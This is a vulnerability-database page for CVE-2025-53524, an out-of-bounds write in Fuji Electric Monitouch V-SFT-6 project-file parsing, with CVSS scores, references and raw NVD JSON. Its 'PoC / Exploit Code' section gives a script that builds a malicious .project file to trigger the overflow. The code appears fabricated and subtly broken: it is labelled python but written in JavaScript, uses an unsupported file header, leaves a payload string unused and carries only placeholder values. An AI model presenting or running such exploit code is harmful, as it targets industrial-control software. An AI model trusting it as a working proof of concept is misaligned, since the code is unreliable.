CVE-2025-53524

Description

Fuji Electric Monitouch V-SFT-6 is vulnerable to an out-of-bounds write while processing a specially crafted project file, which may allow an attacker to execute arbitrary code.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Fuji Electric Monitouch V-SFT-6 < 6.0.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-53524 PoC - Malicious Project File Generator
// This PoC generates a malicious .project file for Fuji Electric Monitouch V-SFT-6
// NOTE: This is for educational and security research purposes only

const fs = require('fs');

function generateMaliciousProjectFile() {
    // Project file header
    let buffer = Buffer.alloc(1024);
    
    // File signature for V-SFT project files
    buffer.write('VSFT', 0, 4, 'ascii');
    buffer.writeUInt16LE(0x0006, 4); // Version
    buffer.writeUInt32LE(0x00000001, 6); // File type
    
    // Craft malicious payload that triggers out-of-bounds write
    // Long string that exceeds buffer boundaries
    const maliciousString = 'A'.repeat(5000);
    
    // Overflow marker and shellcode placeholder
    const overflowPayload = Buffer.alloc(512);
    overflowPayload.fill(0x41); // 'A' bytes
    
    // Write overflow payload at specific offset
    overflowPayload.writeUInt32LE(0x41414141, 0); // Overwrite pointer
    overflowPayload.writeUInt32LE(0x42424242, 4); // Overwrite size
    
    // Combine header and payload
    const finalBuffer = Buffer.concat([buffer, overflowPayload]);
    
    // Write malicious project file
    fs.writeFileSync('malicious_cve_2025_53524.project', finalBuffer);
    console.log('Malicious project file created: malicious_cve_2025_53524.project');
}

generateMaliciousProjectFile();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-53524
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-53524
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-53524/
[4] VulDB https://vuldb.com/cve/CVE-2025-53524
[5] https://felib.fujielectric.co.jp/en/document_search?tab=software&document1%5B1%5D=M10009&document2%5B1%5D=M20104&product1%5B1%5D=P10003&product2%5B1%5D=P20023&product3%5B1%5D=P30623&product4%5B1%5D=S11133&discontinued%5B1%5D=0&count=20&sort=en_title&page=1&region=en-glb
[6] https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-308-01.json
[7] https://www.cisa.gov/news-events/ics-advisories/icsa-25-308-01

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-53524", "sourceIdentifier": "[email protected]", "published": "2025-12-17T01:15:59.930", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fuji Electric Monitouch V-SFT-6 is vulnerable to an out-of-bounds write \nwhile processing a specially crafted project file, which may allow an \nattacker to execute arbitrary code."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://felib.fujielectric.co.jp/en/document_search?tab=software&document1%5B1%5D=M10009&document2%5B1%5D=M20104&product1%5B1%5D=P10003&product2%5B1%5D=P20023&product3%5B1%5D=P30623&product4%5B1%5D=S11133&discontinued%5B1%5D=0&count=20&sort=en_title&page=1&region=en-glb", "source": "[email protected]"}, {"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-308-01.json", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-308-01", "source": "[email protected]"}]}}